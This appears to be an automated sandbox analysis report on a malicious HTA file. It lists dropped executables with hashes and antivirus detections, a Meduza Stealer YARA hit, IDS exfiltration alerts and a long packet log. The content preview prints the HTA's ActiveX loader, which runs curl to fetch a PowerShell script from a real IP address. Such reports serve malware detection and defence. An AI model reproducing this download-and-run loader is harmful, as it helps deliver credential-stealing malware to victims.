                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):206304
                                                                                                            Entropy (8bit):5.9403786086887225
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:gyOSSX7XA5RwkP10/Cg+ufLLobyT9S9jHkQPEZS0bGAPo:tEXjA5yBF+ma9jHfPITGb
                                                                                                            MD5:2696D944FFBEF69510B0C826446FD748
                                                                                                            SHA1:E4106861076981799719876019FE5224EAC2655C
                                                                                                            SHA-256:A4F53964CDDDCCCBD1B46DA4D3F7F5F4292B5DD11C833D3DB3A1E7DEF36DA69A
                                                                                                            SHA-512:C286BC2DA757CBB2A28CF516A4A273DD11B15F674D5F698A713DC794F013B7502A8893AB6041E51BAB3CDD506A18C415B9DF8483B19E312F8FCB88923F42B8EB
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s..u...u...u.......u.......u...u...w.......u.......u......u.......u..Rich.u..........PE..L...........................................0....@..........................0......&G....@... .............................tH.......`...................!.......*.....T...........................H...@............@..l............................text...T........................... ..`.data...t....0......................@....idata..,....@......."..............@..@.rsrc........`.......@..............@..@.reloc...*.......,..................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1292800
                                                                                                            Entropy (8bit):6.519533062327776
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:IgAMXnXkciEIMJQZe8Us9Mjemp5wx1wach0lhSMXl5xT+d:x3Xn0ciEIp3Us+egSx+ahpxTK
                                                                                                            MD5:C6813DA66EBA357D0DEAA48C2F7032B8
                                                                                                            SHA1:6812E46C51F823FF0B0EE17BFCE0AF72F857AF66
                                                                                                            SHA-256:1420F60F053C3EA5605239EE431E5F487245108B1C01BE75D16B5246156FA178
                                                                                                            SHA-512:19391C6B12BA8F34A5FAF326F8986EF8DE4729D614D72BF438C6EFA569B3505159CA55F580FE2A02642E5E7A0F1B38A7A9DB9F0D66D67BA548D84C230183159E
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: C:\Windows\Temp\io12j1es.2tm.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.7./.d./.d./.d.W.e./.d.W.e./.d..e./.d...e./.d...e./.d...e./.d.W.e8/.d.W.e./.d.W.e./.d./.d...d.W.e./.d..e./.d.>d./.d..e./.dRich./.d........PE..d....7;g.........."....).4.......... ..........@..........................................`.................................................h...@................l..............<......8.......................(.......@............P..x............................text....2.......4.................. ..`.rdata..x....P.......8..............@..@.data....|.......Z..................@....pdata...l.......n...<..............@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):6144
                                                                                                            Entropy (8bit):3.6989393576979213
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:fNnyOybUJQ23GgX791qKilsZODTgFZP/8R:fNnyOybrVO9QKilhfgFZP/u
                                                                                                            MD5:E017BE56699801DC89A8D6D1724EB633
                                                                                                            SHA1:A7F7AAE4744210DB8EBAF4DA06C167357BC71ECA
                                                                                                            SHA-256:AA6B0863022BDA1E0C263A75AE2896FE473D3BF57A76EFC258B3AFEC8C157564
                                                                                                            SHA-512:2368425DADC7F22EB11532359D4D1AA97BF3E381F4FD7B62C587E1F8819EF64A0FF7FC75CC5948939FADEBC423345AB65A1CD2799BB4136FBEA89D1F75DFC8C8
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....eag...........!.................+... ...@....... ....................................@..........................@..(...\+..O....`............................................................................... ............... ..H............text........ ...................... ..`.sdata..V....@......................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            File type:HTML document, ASCII text, with CRLF line terminators
                                                                                                            Entropy (8bit):4.537416933867132
                                                                                                            TrID:
                                                                                                              File name:script.hta
                                                                                                              File size:551 bytes
                                                                                                              MD5:4041595b42e7b6e2ce5965cb76ea7da1
                                                                                                              SHA1:401723ee1ac651ad359b89dd7e3cefea91d6aaa9
                                                                                                              SHA256:054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f
                                                                                                              SHA512:84cfba05772a5adfef0ddfe65bda07d8b908c16de04ea60942338c49a98db625801a986fd999740f61c62650b6e8ebb7f6056e76fe8656d09207f4cf9ffe7c19
                                                                                                              SSDEEP:12:xgkEqJmuGWEqr0lFH7YYF+8XIYAHpcAowMWr93ZO6lpsMCL8Gb:xne2s10YfwMWHJCMC7
                                                                                                              TLSH:75F0DC6A0C99D60C40BB662999A6A22CDB5322471301CA53718CD2022F31104C942FDC
                                                                                                              File Content Preview:..<html>..<head>.. <script type="text/javascript">.. (function Execute() {.. try {.. var shell = new ActiveXObject("WScript.Shell");.... var command = "cmd.exe /c curl -s http://147.45.47.15/script.ps1 |
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-19T08:11:41.306717+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734147.45.47.1580TCP
                                                                                                              2024-12-19T08:11:59.129786+01002049441ET MALWARE Win32/Unknown Grabber Base64 Data Exfiltration Attempt1192.168.2.449740193.3.19.15115666TCP
                                                                                                              2024-12-19T08:11:59.129786+01002050806ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M21192.168.2.449740193.3.19.15115666TCP
                                                                                                              2024-12-19T08:11:59.129786+01002050807ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)1192.168.2.449740193.3.19.15115666TCP
                                                                                                              2024-12-19T08:11:59.249727+01002050806ET MALWARE [ANY.RUN] Meduza Stealer Exfiltration M21192.168.2.449740193.3.19.15115666TCP
                                                                                                              2024-12-19T08:11:59.249727+01002050807ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)1192.168.2.449740193.3.19.15115666TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 19, 2024 08:11:37.415360928 CET4973180192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:37.534990072 CET8049731147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:37.535079002 CET4973180192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:37.535695076 CET4973180192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:37.655147076 CET8049731147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:38.793356895 CET8049731147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:38.801666975 CET4973180192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:38.921765089 CET8049731147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:38.921837091 CET4973180192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:39.459069014 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:39.578850985 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:39.578936100 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:39.580110073 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:39.699542046 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:40.838850975 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:40.838890076 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:40.838902950 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:40.838943958 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:40.838984013 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:40.839004993 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:40.839020014 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:40.839035988 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:40.839065075 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:40.905538082 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.025100946 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.306653976 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.306673050 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.306684017 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.306716919 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.306822062 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.306833029 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.306864023 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.315134048 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.315148115 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.315179110 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.323486090 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.323537111 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.323607922 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.331876993 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.331918955 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.331971884 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.340157032 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.340205908 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.396259069 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.396271944 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.396379948 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.400188923 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.400271893 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.400315046 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.426255941 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.426395893 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.426439047 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.498626947 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.498698950 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.498756886 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.503035069 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.503245115 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.503288031 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.511729002 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.516417027 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.516480923 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.517798901 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.523570061 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.523622036 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.523761988 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.531217098 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.531414032 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.531507015 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.539356947 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.539417028 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.539473057 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.547791958 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.547902107 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.547945976 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.556297064 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.556312084 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.556354046 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.564572096 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.564646006 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.564661980 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.570074081 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.570086002 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.570131063 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.574927092 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.574984074 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.576637983 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.588443041 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.588454962 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.588603973 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.590728998 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.590783119 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.590802908 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.596081018 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.596092939 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.596132994 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.601255894 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.601305962 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.601345062 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.606455088 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.606494904 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.606507063 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.618335962 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.618379116 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.618521929 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.694422007 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.694526911 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.694628954 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.696923018 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.696970940 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.697012901 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.701924086 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.701936007 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.701968908 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.706770897 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.706783056 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.706826925 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.711352110 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.711530924 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.711580992 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.716082096 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.716247082 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.716288090 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.720959902 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.721317053 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.721365929 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.725368023 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.725514889 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.725560904 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.729370117 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.729463100 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.729511023 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.733573914 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.733587027 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.733623981 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.737584114 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.737653971 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.737694025 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.741475105 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.741561890 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.741604090 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.745573997 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.745619059 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.745681047 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.749758959 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.749852896 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.749895096 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.751847982 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.752007008 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.752057076 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.754410028 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.754549980 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.754594088 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.757309914 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.757322073 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.757369995 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.759536028 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.759635925 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.759677887 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.762140036 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.762428045 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.762476921 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.764625072 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.764807940 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.764856100 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.767060995 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.814172983 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.814248085 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.814352036 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.815426111 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.815478086 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.815864086 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.816059113 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.816102982 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.818478107 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.818574905 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.818619013 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.821377039 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.821388960 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.821425915 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.823539972 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.824412107 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.824455023 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.826062918 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.826280117 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.826328993 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.882615089 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.882630110 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.882689953 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.883308887 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.883470058 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.883513927 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.885989904 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.886002064 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.886044979 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.888390064 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.888483047 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.888523102 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.890994072 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.891100883 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.891149044 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.893593073 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.893863916 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.893924952 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.896058083 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.896135092 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.896178961 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.898591995 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.898659945 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.898699999 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.901108027 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.901159048 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.901201963 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.903661013 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.903732061 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.903778076 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.906244040 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.906291962 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.906339884 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.908690929 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.908865929 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.908909082 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.913115978 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.913129091 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.913167953 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.914133072 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.914151907 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.914197922 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.916424990 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.916436911 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.916479111 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.918967962 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.919166088 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.919317007 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.921519041 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.921540976 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.921580076 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.924071074 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.924225092 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.924263954 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.926974058 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.927048922 CET8049734147.45.47.15192.168.2.4
